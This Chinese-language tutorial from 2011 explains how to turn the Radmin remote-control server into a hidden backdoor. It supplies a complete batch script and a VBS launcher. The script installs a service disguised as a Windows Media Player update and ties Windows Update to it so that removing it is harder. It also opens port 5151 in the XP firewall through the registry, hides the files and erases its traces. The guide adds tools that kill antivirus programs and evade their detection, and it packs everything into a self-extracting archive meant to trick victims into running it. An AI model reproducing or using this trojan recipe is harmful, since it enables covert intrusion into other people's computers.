打造完美远程控制软件Radmin

发布时间：2011-06-26 05:01:40作者：知识屋

大家好，关于如何打造出完美的Radmin服务端，网上有很多类似的修改后的程序，但有的服务名会暴露，有的会显示CMD窗口，我弥补了它们的缺点，综合了它们的优点，打造出了现在这个完美的Radmin服务端。

准备工具

Rock免杀工具；

IcoSprite图标更改器；

Killer15杀杀毒软件防火墙工具；

SC.exe服务添加删除更改工具；

AdmDll.dll、Raddrv.dll、R_server（这个不用说了吧，Radmin的服务端）。

程序特点

自解压形式，双击即可，自动解压到%systemroot%system32 drivers目录下，并能干掉卡巴斯基等杀毒软件。使用vbs嵌套bat来执行所有内容，不会跳出任何窗口。自建服务，并修改服务名、显示名、描述使其做到隐蔽。依存Windows Update服务，给试图关闭它带来困惑。做完一切后以只读，隐藏形式隐蔽Radmin服务端的三个程序，删除掉生成的一些REG、BAT、VBS文件，并能够突破Radmin外部连接进来时XP SP2防火墙的拦截。

制作过程

首先自己安装一下Radmin服务端，配置完密码，端口等信息后导出其在 HKEY_LOCAL_MACHINESYSTEMRAdmin的注册表文件，这里我另存为名Server.reg。然后要修改 R_server.exe的图标并修改文件名为迷惑性文字如Update.exe，修改图标我用IcoSprite，觉得还不错。这样假如对方装有天网之类防火墙的话，可以骗过一些菜鸟，同意允许对外连接。

接下来我们制作核心部分，最关键的BAT，重要的我将简单解释：

@echo off 

@sc stop r_server 

‘假如已经被装过R_server服务，先用SC将它停掉。 

@sc delete r_server 

‘将已经装过R_server服务删除。 

@regedit /s server.reg 

@SC create MPservice BinPath= "%systemroot%system32driversUpdate.exe /service" type= 

own type= interact start= auto DisplayName= "Media Player of Remote Control Driver 

Update" 

‘这句是用SC建立一个服务，服务名为Mpservice，路径Binpath为"%systemroot%system32

driversUpdate.exe /service"，类型type为 own 与interact交互，启动类型start为自动，

显示名DisplayName为"Media Player of Remote Control Driver Update"。 

@sc description MPservice "为Windows Media Player提供加载进程及驱动程序、

库提供基层更新安全补丁的服务。" 

‘这句是将MPservice服务的描述改为“为Windows Media Player提供加载进程及驱动程序、

库提供基层更新安全补丁的服务。” 

@sc config wuauserv depend= MPservice 

‘配置MPservice使wuauserv服务依存此服务（wuauserv可以根据自己喜欢改成其它服务，这里的

wuauserv是系统在Windows Update 

网站的自动更新服务）。这里的目的是迷惑管理员，使其不敢轻易停止我们生成的Radmin服务。 

@echo Windows Registry Editor Version 5.00 > %systemroot%system32

driversDisFirewall.reg 

@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParameters

FirewallPolicy

StandardProfileGloballyOpenPortsList] >> %systemroot%system32driversDisFirewall.reg 

‘这里添加成的一个DisFirewall.reg注册表文件，在对方是XP SP2系统的情况下

将起到很大重要，由于SP2自带的防火墙配置信息是存

放于注册表中的，所有完全可以通过写入自己想要的信息使你的R_server可以接受

外界的连接。 

@echo "5151:TCP"="5151:TCP:*:Enabled:Windows Update Services">> stemroot%system32

driversDisFirewall.reg 

‘这句是允许外部连接5151的TCP端口，设置防火墙此规则名为Windows Update Services。 

@regedit /s %systemroot%system32driversDisFirewall.reg 

@attrib +h +r %systemroot%system32driversUpdate.exe 

@attrib +h +r %systemroot%system32driversadmdll.dll 

@attrib +h +r %systemroot%system32driversraddrv.dll 

‘以上三句是设置服务端三个文件为隐藏、只读属性。 

@sc start MPservice 

@del /q /f /s %systemroot%system32driversserver.reg 

@del /q /f /s %systemroot%system32driversUpdate.vbs 

@del /q /f /s %systemroot%system32driversUpdate.bat 

@del /q /f /s %systemroot%system32driverssc.exe 

@del /q /f /s %systemroot%system32driversDisFirewall.reg 

‘以上是清理生成出来的杂物，加参数/q是以安静模式删除，不要求确认，

参数/f是强制删除只读文件，参数/s是从所有子目录删除指定文件。

接下来制作一个vbs文件，作用是令bat里的内容以安静模式执行，这样就可以让cmd窗口跳出来了，增加了不少隐蔽性。里面写上如下代码：

On Error Resume Next 

set wshshell=createobject ("wscript.shell") 

a=wshshell.run ("Update.bat"，0)

最后出场的是Killer15.exe这个东东，按它的说明书说是可以杀Norton AntiVirus、McAfee、个人计算机Cillin&KAV等。我用我的卡巴2006测试过，确实能被它杀掉。由于直接运行的话还没执行就被杀毒软件给干掉了，所以给它加个壳，这里用Rock免杀工具，经过它加的壳后逃过了我卡巴的大关，格式是：

usage: rock [filename]

好了，整理一下：三个服务端文件+一个注册表信息，一个BAT，一个VBS，一个SC，一个 Killer15，一共是8个文件，将它们打包制成自解压形式。勾选RAR里的“创建自解压格式压缩文件”，到高级里打开“自解压选项”，“解压路径” 为%systemroot%system32drivers，解压后运行“Update.vbs”，解压前运行 “Killer15.new.exe”，模式里选“全部隐藏”跟“跳过已经存在文件”，文本和图标选项里“从文件加载自解压文件图标”里选一个迷惑性的 ico图标做为自解压最后生成的图标。OK，一个自解压形式的Radmin服务端就这样生成了。假如你是*欺骗别人双击执行的，你还可以自己添加个小游戏之类的进去，令它双击自解压的同时不会什么反映都没有，这里我就不再阐述了。

（免责声明：文章内容如涉及作品内容、版权和其它问题，请及时与我们联系，我们将在第一时间删除内容，文章内容仅供参考）